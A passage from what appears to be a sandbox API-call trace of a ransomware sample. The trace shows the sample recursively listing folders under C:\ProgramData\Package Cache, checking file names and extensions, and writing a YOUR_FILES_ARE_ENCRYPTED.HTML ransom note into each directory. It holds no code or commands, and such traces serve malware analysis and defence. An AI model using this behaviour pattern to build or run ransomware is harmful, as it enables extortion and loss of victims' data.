ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cbe7d30, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cbe7d30, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 0 [0157.553] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.553] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0157.553] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.554] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: 
lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.556] CloseHandle (hObject=0x58c) returned 1 [0157.557] GetProcessHeap () returned 0x270000 [0157.558] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.563] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87c35b0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="D4036846864773E3D647F421DFE7F6CA536E307B", cAlternateFileName="D40368~1")) returned 1 [0157.563] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B") returned 73 [0157.563] GetProcessHeap () returned 0x270000 [0157.563] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.566] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B") returned="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B" [0157.566] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\*" [0157.566] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\*", lpFindFileData=0x4ebde60 | out: 
lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87c35b0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.566] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87c35b0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.567] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0157.567] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages") returned 82 [0157.567] GetProcessHeap () returned 0x270000 [0157.567] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.568] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package 
Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages" [0157.568] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\*" [0157.568] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.568] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.568] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, 
ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Patch", cAlternateFileName="")) returned 1 [0157.568] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch") returned 88 [0157.569] GetProcessHeap () returned 0x270000 [0157.569] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.571] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch") returned="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch" [0157.571] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\*" [0157.571] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.572] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.572] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x86", cAlternateFileName="")) returned 1 [0157.572] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86") returned 92 [0157.572] GetProcessHeap () returned 0x270000 [0157.572] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0157.573] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86" [0157.573] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\*") returned="\\\\?\\C:\\ProgramData\\Package 
Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\*" [0157.573] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0157.573] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.574] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7584c900, ftCreationTime.dwHighDateTime=0x1d0a14b, ftLastAccessTime.dwLowDateTime=0x7584c900, ftLastAccessTime.dwHighDateTime=0x1d0a14b, ftLastWriteTime.dwLowDateTime=0x7584c900, ftLastWriteTime.dwHighDateTime=0x1d0a14b, nFileSizeHigh=0x0, nFileSizeLow=0x98303, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows6.1-KB2999226-x86.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0157.574] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\Windows6.1-KB2999226-x86.msu") returned 121 [0157.574] lstrcmpW 
(lpString1="Windows6.1-KB2999226-x86.msu", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.574] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x86.msu") returned=".msu" [0157.574] lstrlenW (lpString=".msu") returned 4 [0157.574] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x86.msu") returned=".msu" [0157.574] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7584c900, ftCreationTime.dwHighDateTime=0x1d0a14b, ftLastAccessTime.dwLowDateTime=0x7584c900, ftLastAccessTime.dwHighDateTime=0x1d0a14b, ftLastWriteTime.dwLowDateTime=0x7584c900, ftLastWriteTime.dwHighDateTime=0x1d0a14b, nFileSizeHigh=0x0, nFileSizeLow=0x98303, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows6.1-KB2999226-x86.msu", cAlternateFileName="WINDOW~1.MSU")) returned 0 [0157.574] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0157.574] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0157.575] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\patch\\x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0157.575] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0157.578] CloseHandle (hObject=0x4a8) returned 1 [0157.578] GetProcessHeap () returned 
0x270000 [0157.579] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0157.579] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x86", cAlternateFileName="")) returned 0 [0157.580] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.580] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0157.580] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\patch\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.580] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.583] CloseHandle (hObject=0x5a0) returned 1 [0157.583] GetProcessHeap () returned 0x270000 [0157.585] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.585] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Patch", cAlternateFileName="")) returned 0 [0157.585] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.585] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0157.585] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.586] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.588] CloseHandle (hObject=0x598) returned 1 [0157.589] GetProcessHeap () returned 0x270000 [0157.590] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.590] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 0 [0157.591] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.591] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0157.591] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.591] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.594] CloseHandle (hObject=0x58c) returned 1 [0157.594] GetProcessHeap () returned 0x270000 [0157.596] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.602] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508", cAlternateFileName="{0FA68~1.285")) returned 1 [0157.602] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508") returned 83 [0157.602] GetProcessHeap () returned 0x270000 [0157.602] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.604] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508" [0157.604] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*" [0157.604] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.605] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="..", cAlternateFileName="")) returned 1 [0157.605] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0157.605] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages") returned 92 [0157.605] GetProcessHeap () returned 0x270000 [0157.606] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.606] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages" [0157.606] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*" [0157.607] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*", lpFindFileData=0x4ebdb54 | out: 